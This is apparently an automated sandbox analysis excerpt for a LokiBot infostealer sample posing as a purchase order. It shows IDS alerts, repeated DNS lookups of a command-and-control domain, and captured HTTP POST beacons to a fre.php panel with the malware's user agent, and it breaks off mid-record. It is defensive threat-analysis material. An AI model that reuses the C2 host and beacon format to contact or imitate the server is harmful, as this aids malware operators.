                            02/23/21-08:50:02.942234TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.5192.185.78.145

                            Network Port Distribution

                            TCP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP

                            UDP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP

                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            Feb 23, 2021 08:49:51.972486973 CET192.168.2.58.8.8.80x24a9Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.794002056 CET192.168.2.58.8.8.80x4bcdStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:53.589860916 CET192.168.2.58.8.8.80x1c9dStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:54.398741961 CET192.168.2.58.8.8.80x275aStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:55.252079010 CET192.168.2.58.8.8.80x1b29Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.039648056 CET192.168.2.58.8.8.80x5404Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.871685028 CET192.168.2.58.8.8.80xaf87Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:57.685812950 CET192.168.2.58.8.8.80x135bStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:58.478722095 CET192.168.2.58.8.8.80xeb5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:59.317658901 CET192.168.2.58.8.8.80x8433Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.153100967 CET192.168.2.58.8.8.80xff51Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:00.970994949 CET192.168.2.58.8.8.80x7427Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:02.258004904 CET192.168.2.58.8.8.80xb8cbStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:04.100541115 CET192.168.2.58.8.8.80x4116Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:50:05.398031950 CET192.168.2.58.8.8.80x6758Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Feb 23, 2021 08:49:20.727756977 CET | 8.8.8.8 | 192.168.2.5 | 0xf8af | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                            Feb 23, 2021 08:49:22.859203100 CET | 8.8.8.8 | 192.168.2.5 | 0x93ce | No error (0) | hrf0ga.bn.files.1drv.com | bn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                            Feb 23, 2021 08:49:22.859203100 CET | 8.8.8.8 | 192.168.2.5 | 0x93ce | No error (0) | bn-files.fe.1drv.com | odc-bn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                            Feb 23, 2021 08:49:25.141832113 CET | 8.8.8.8 | 192.168.2.5 | 0xdb4e | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:26.124541044 CET | 8.8.8.8 | 192.168.2.5 | 0xa0e7 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:27.337553024 CET | 8.8.8.8 | 192.168.2.5 | 0x6790 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:29.017906904 CET | 8.8.8.8 | 192.168.2.5 | 0xf96f | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:30.895327091 CET | 8.8.8.8 | 192.168.2.5 | 0xd073 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:31.759629965 CET | 8.8.8.8 | 192.168.2.5 | 0x33aa | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:32.725080013 CET | 8.8.8.8 | 192.168.2.5 | 0xd44c | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:33.584520102 CET | 8.8.8.8 | 192.168.2.5 | 0x22c5 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:34.459041119 CET | 8.8.8.8 | 192.168.2.5 | 0xb9ca | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:35.333215952 CET | 8.8.8.8 | 192.168.2.5 | 0x6b5 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:36.212917089 CET | 8.8.8.8 | 192.168.2.5 | 0x9a3a | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:39.066433907 CET | 8.8.8.8 | 192.168.2.5 | 0x12d7 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:39.900213003 CET | 8.8.8.8 | 192.168.2.5 | 0x25e9 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:40.853167057 CET | 8.8.8.8 | 192.168.2.5 | 0x78cc | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:41.674030066 CET | 8.8.8.8 | 192.168.2.5 | 0xc62b | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:42.540183067 CET | 8.8.8.8 | 192.168.2.5 | 0x73a4 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:43.366683006 CET | 8.8.8.8 | 192.168.2.5 | 0xda20 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:44.181931973 CET | 8.8.8.8 | 192.168.2.5 | 0x3245 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:45.108205080 CET | 8.8.8.8 | 192.168.2.5 | 0x9662 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:46.097811937 CET | 8.8.8.8 | 192.168.2.5 | 0xd00 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:46.942615032 CET | 8.8.8.8 | 192.168.2.5 | 0xb63f | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:47.807673931 CET | 8.8.8.8 | 192.168.2.5 | 0x3762 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:48.686953068 CET | 8.8.8.8 | 192.168.2.5 | 0xb0d5 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:49.529510021 CET | 8.8.8.8 | 192.168.2.5 | 0xef29 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:50.429570913 CET | 8.8.8.8 | 192.168.2.5 | 0xa120 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:51.234113932 CET | 8.8.8.8 | 192.168.2.5 | 0x26d4 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:52.021190882 CET | 8.8.8.8 | 192.168.2.5 | 0x24a9 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:52.850966930 CET | 8.8.8.8 | 192.168.2.5 | 0x4bcd | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:53.648022890 CET | 8.8.8.8 | 192.168.2.5 | 0x1c9d | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:54.453586102 CET | 8.8.8.8 | 192.168.2.5 | 0x275a | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:55.309329987 CET | 8.8.8.8 | 192.168.2.5 | 0x1b29 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:56.093118906 CET | 8.8.8.8 | 192.168.2.5 | 0x5404 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:56.923170090 CET | 8.8.8.8 | 192.168.2.5 | 0xaf87 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:57.742845058 CET | 8.8.8.8 | 192.168.2.5 | 0x135b | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:58.527405977 CET | 8.8.8.8 | 192.168.2.5 | 0xeb5 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:49:59.380300045 CET | 8.8.8.8 | 192.168.2.5 | 0x8433 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:50:00.204687119 CET | 8.8.8.8 | 192.168.2.5 | 0xff51 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:50:01.022571087 CET | 8.8.8.8 | 192.168.2.5 | 0x7427 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:50:02.306612015 CET | 8.8.8.8 | 192.168.2.5 | 0xb8cb | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:50:04.158838034 CET | 8.8.8.8 | 192.168.2.5 | 0x4116 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)
                            Feb 23, 2021 08:50:05.446899891 CET | 8.8.8.8 | 192.168.2.5 | 0x6758 | No error (0) | accessasia.com.hk | | 192.185.78.145 | A (IP address) | IN (0x0001)

                            HTTP Request Dependency Graph

                            • accessasia.com.hk

                            HTTP Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.5 | 49732 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:25.317523003 CET | 5360 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 192
                            Connection: close
                            Feb 23, 2021 08:49:25.682240009 CET | 5361 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 23 Feb 2021 07:49:25 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 15
                            Content-Type: text/html
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.5 | 49733 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:26.296646118 CET | 5362 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 192
                            Connection: close
                            Feb 23, 2021 08:49:26.654206038 CET | 5362 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 23 Feb 2021 07:49:26 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 15
                            Content-Type: text/html
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            10 | 192.168.2.5 | 49743 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:38.359103918 CET | 5384 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:38.721246004 CET | 5385 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:38 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            11 | 192.168.2.5 | 49744 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:39.237473965 CET | 5386 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:39.593688965 CET | 5387 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:39 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            12 | 192.168.2.5 | 49745 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:40.069118023 CET | 5387 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:40.433582067 CET | 5388 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:40 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            13 | 192.168.2.5 | 49746 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:41.025088072 CET | 5389 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:41.377275944 CET | 5389 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            14 | 192.168.2.5 | 49747 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:41.847378016 CET | 5390 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:42.205475092 CET | 5391 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:41 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            15 | 192.168.2.5 | 49748 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:42.711982012 CET | 5392 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:43.067840099 CET | 5392 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:42 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            16 | 192.168.2.5 | 49749 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:43.540302992 CET | 5393 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:43.895927906 CET | 5394 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:43 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            17 | 192.168.2.5 | 49750 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:44.361483097 CET | 5395 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:44.730729103 CET | 5395 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:44 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            18 | 192.168.2.5 | 49751 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:45.281075954 CET | 5396 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:45.682168007 CET | 5397 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:45 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            19 | 192.168.2.5 | 49752 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:46.290244102 CET | 5397 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:46.657223940 CET | 5398 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:46 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.5 | 49734 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:27.514702082 CET | 5363 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:27.879473925 CET | 5364 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:27 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            20 | 192.168.2.5 | 49753 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:47.113450050 CET | 5399 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:47.496956110 CET | 5426 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:47 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            21 | 192.168.2.5 | 49755 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:47.991494894 CET | 5470 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:48.352315903 CET | 5501 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            22 | 192.168.2.5 | 49759 | 192.185.78.145 | 80 | C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:48.867384911 CET | 5546 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:49.230602980 CET  kBytes transferred: 5557  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 23  Source IP: 192.168.2.5  Source Port: 49761  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp: Feb 23, 2021 08:49:49.698286057 CET  kBytes transferred: 5734  Direction: OUT  Data:
                            POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Timestamp: Feb 23, 2021 08:49:50.121752977 CET  kBytes transferred: 5747  Direction: IN  Data:
                            HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:49 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 24  Source IP: 192.168.2.5  Source Port: 49763  Destination IP: 192.185.78.145  Destination Port: 80  Process: C:\Users\user\Desktop\PO-A2174679-06.exe
